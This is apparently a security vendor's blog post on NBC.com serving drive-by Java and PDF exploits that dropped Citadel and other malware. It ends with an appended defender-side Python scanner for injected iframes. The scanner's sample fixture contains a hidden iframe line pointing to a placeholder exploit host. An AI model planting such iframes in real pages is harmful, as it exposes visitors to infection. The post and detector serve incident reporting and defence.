A few hours ago Ronald Prins of Fox-IT (@cryptoron) was tweeting about NBC.com infecting its visitors with malicious software (malware). We were investigating this as well and found the following interesting facts.
Update: Fox-IT has also posted a blog item on the incident.
There were two exploit links on the NBC website. The first one was on the main default (entry) page, and the second one was located in hxxp://www.nbc.com/assets/core/js/s_wrapper.js
It serves both Java (CVE-2013-0422) and PDF exploits. The exploit drops the Citadel Trojan which is used for banking fraud and cyber-espionage. The Citadel malware communicates with the following server, which is already sinkholed:
An hour later the attack pages were swapped, which means the cyber criminals still have access to NBC’s pages. We’ve seen them linking to e.g.:
RedKit was also used last year during the Telegraaf attack in The Netherlands, which served the Citadel Trojan from the Pobelka botnet (Dutch). The Pobelka botnet stole highly sensitive information (including usernames, passwords, certificates, documents and other data), 750GB in size, from over 150,000 computers located in networks of the Dutch government, hospitals, vital infrastructure like water and power plants, airlines, multinationals and other companies.
On-Demand Detection and Timeline
HitmanPro’s behavioral scan detects zero-day Citadel malware quite easily, as can be seen in the screenshot below.
The new forensic cluster feature of HitmanPro establishes a clear post-infection timeline. So even if you got infected a few days ago, HitmanPro provides evidence of how that happened.
The ZeroAccess malware moderates an affected user’s Internet experience by modifying search results, and generates pay-per-click advertising revenue for its controllers, the cybercriminals. ZeroAccess is a dangerous threat that uses stealth techniques in order to hinder its detection and removal.
The attack also served an unknown malware binary, connecting to various websites:
Some antivirus vendors identify this malware as Zbot or a rootkit (MD5: 1fa5afe1ddcd083d40b5b330fd9b3613), but it is most definitely not Zbot and it’s not a rootkit either. The malware binary has a curious filename (3S4H3S.exe) and an interesting string at the end “SadokBdi”. If you Google Sadok or Kodas, you come across some interesting webpages.
While the attack is ongoing, Facebook.com is preventing posts to NBC.com, as can be seen from this screenshot:
Perform Second Opinion Scan
If you’ve visited NBC.com today, you should perform a FREE second opinion scan to see if your computer got infected. You can download HitmanPro from here: get.hitmanpro.com
Late Night Show Jimmy Fallon
4 hours after the initial detection, the webpages of NBC.com still contained iframes opening exploit sites. In addition, we have seen other webpages like hxxp://www.latenightwithjimmyfallon.com and hxxp://www.jaylenosgarage.com serving some of the same links as NBC.com. This is also confirmed by the people at the Sucuri blog.
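As an added defender-side example (not code from the original post, nor from HitmanPro), the following Python script scans a page's HTML or a site-owned JavaScript file for injected iframes of the kind described above: an off-site src combined with zero/one-pixel sizing or hidden styling. The sample content, the hostnames and the trusted-host list are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a site-owned JS file carrying an injected iframe, in the
# style of the s_wrapper.js case above. Hosts and paths are placeholders.
SAMPLE_JS = """
var s_wrapper = {init: function(){ /* legitimate site code */ }};
document.write('<iframe src="http://exploit-host.example/index.php" width="1" height="1" style="visibility:hidden"></iframe>');
"""

# Constructed sample page: one legitimate embed on a trusted subdomain and one
# zero-size off-site iframe (placeholder hosts).
SAMPLE_HTML = """
<html><body>
<iframe src="https://player.nbc.example/embed/123" width="640" height="360"></iframe>
<iframe src="http://exploit-host.example/in.php" width="0" height="0" frameborder="0"></iframe>
</body></html>
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]*)""")


def parse_attrs(attr_text):
    """Turn the attribute text of one <iframe ...> tag into a lowercase-keyed dict."""
    return {k.lower(): v for k, v in ATTR_RE.findall(attr_text)}


def is_suspicious(attrs, trusted_hosts):
    """Flag an iframe whose src points off-site AND which is sized or styled to be invisible."""
    host = urlparse(attrs.get("src", "")).hostname or ""
    off_site = host and not any(host == t or host.endswith("." + t) for t in trusted_hosts)
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    style = attrs.get("style", "").lower()
    hidden = "visibility:hidden" in style or "display:none" in style
    return bool(off_site and (tiny or hidden))


def find_injected_iframes(content, trusted_hosts):
    """Return the src of every suspicious iframe found in HTML or JS content."""
    hits = []
    for m in IFRAME_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        if is_suspicious(attrs, trusted_hosts):
            hits.append(attrs.get("src"))
    return hits


if __name__ == "__main__":
    for name, content in (("s_wrapper.js", SAMPLE_JS), ("index.html", SAMPLE_HTML)):
        print(name, find_injected_iframes(content, ["nbc.example"]))
```

Run it over the site's own static files after a compromise notice, or on a schedule, and treat any hit as a signal to pull the file and compare it against the deployed version in source control.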